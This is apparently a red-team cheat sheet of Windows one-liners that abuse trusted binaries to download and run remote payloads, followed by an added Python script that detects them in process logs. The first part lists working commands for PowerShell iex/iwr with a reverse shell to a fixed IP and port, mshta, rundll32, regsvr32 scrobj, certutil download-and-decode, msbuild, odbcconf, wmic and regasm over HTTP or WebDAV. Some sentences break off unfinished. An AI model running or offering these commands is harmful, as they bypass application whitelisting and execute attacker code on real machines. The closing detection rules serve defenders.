PowerShell
powershell.exe iex (iwr http://172.16.100.211/Invoke-PowerT.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.211 -Port 443
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
But you can also call the payload directly from a WebDAV server:
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
Cmd
Check out the great work by Arno0x with the Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior's work): it shows that you can easily execute any binary, DLL or script this way:
cmd.exe /k < \\webdavserver\folder\batchfile.txt
Cscript/Wscript
cscript //E:jscript \\webdavserver\folder\payload.txt
Mshta
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
As seen in the koadic framework, mshta also accepts a URL as an argument and will execute the HTA file it points to:
mshta http://webserver/payload.hta
Rundll32
UNC path:
rundll32 \\webdavserver\folder\payload.dll,entrypoint
JScript:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
Wmic
wmic os get /format:"https://webserver/payload.xsl"
Regasm/Regsvc
Application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (it can be written in .NET/C#) that exposes the proper interfaces, and you can then call it over WebDAV:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
Regsvr32
Another one from @subTee. This one requires a slightly different scriptlet from the mshta one above. First option:
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
Second option using UNC/WebDAV:
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
Odbcconf
Note that the DLL file doesn't need to have the .dll extension. It can be loaded over UNC/WebDAV:
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
Msbuild
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
Certutil
Great work by @subTee for discovering this:
certutil -urlcache -split -f http://webserver/payload payload
Combining several commands on one line, with InstallUtil.exe executing a specific DLL as the payload:
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
You could simply deliver an executable:
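A defender-side counterpart to the one-liners above, added here as an example and not part of the original page: every technique listed hands a trusted Windows binary an http(s):// URL or a UNC path, so that is what these rules key on. The rule names, regular expressions and sample log lines are constructed, and the log format (a `CommandLine:` field as Sysmon Event ID 1 or Security 4688 would record it) is an assumption.

```python
import re

# Added detection example (not from the original page): match process command lines
# (Sysmon Event ID 1 / Security 4688 "CommandLine") against the LOLBin patterns listed
# above. The common thread is a trusted Windows binary being handed an http(s):// URL
# or a UNC path (\\server\share), so that is what each rule keys on.
REMOTE = r"(?:https?://|\\\\[^\s\\]+\\)"   # URL or UNC prefix
RULES = {
    "powershell_remote_script": re.compile(
        r"powershell(?:\.exe)?.*?(?:\biwr\b|invoke-webrequest|downloadstring|-f(?:ile)?\s+\\\\)", re.I),
    "cmd_stdin_from_unc": re.compile(r"cmd(?:\.exe)?\s+/k\s*<\s*\\\\", re.I),
    "script_host_unc": re.compile(r"[cw]script(?:\.exe)?\s+//E:\S+\s+\\\\", re.I),
    "mshta_remote": re.compile(r"mshta(?:\.exe)?\s+(?:vbscript:|javascript:|" + REMOTE + ")", re.I),
    "rundll32_script_or_unc": re.compile(r"rundll32(?:\.exe)?\s+(?:javascript:|\\\\)", re.I),
    "wmic_remote_xsl": re.compile(r"wmic.*?/format:\"?" + REMOTE, re.I),
    "regasm_unc": re.compile(r"regasm(?:\.exe)?\s+/u\s+\\\\", re.I),
    "regsvr32_scrobj": re.compile(r"regsvr32.*?/i:" + REMOTE + r".*?scrobj\.dll", re.I),
    "odbcconf_regsvr_unc": re.compile(r"odbcconf.*?\{regsvr\s+\\\\", re.I),
    "msbuild_unc": re.compile(r"msbuild(?:\.exe)?.*?\\\\", re.I),
    "certutil_download_or_decode": re.compile(r"certutil.*?-(?:urlcache|decode)\b", re.I),
}

def classify(cmdline):
    """Return the names of every rule the command line triggers (empty list = no hit)."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(log_lines):
    """Return [(line_no, hits)] for each 'CommandLine: ...' log line that triggers a rule."""
    findings = []
    for no, line in enumerate(log_lines, 1):
        _, sep, cmd = line.partition("CommandLine: ")
        hits = classify(cmd) if sep else []
        if hits:
            findings.append((no, hits))
    return findings

# Constructed sample log: three commands from the page plus two benign lines that must not alert.
SAMPLE_LOG = [
    "CommandLine: certutil -urlcache -split -f http://webserver/payload payload",
    "CommandLine: regsvr32 /u /n /s /i:\\\\webdavserver\\folder\\payload.sct scrobj.dll",
    "CommandLine: rundll32.exe shell32.dll,Control_RunDLL",          # benign
    "CommandLine: mshta http://webserver/payload.hta",
    "CommandLine: powershell -File C:\\scripts\\backup.ps1",          # benign
]

if __name__ == "__main__":
    for no, hits in scan(SAMPLE_LOG):
        print(f"line {no}: {', '.join(hits)}")
```

The regexes are deliberately narrow (remote source plus the specific switch each technique needs) so that local, signed use of the same binaries does not alert; tune them against your own baseline before deploying.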
This information was referenced from: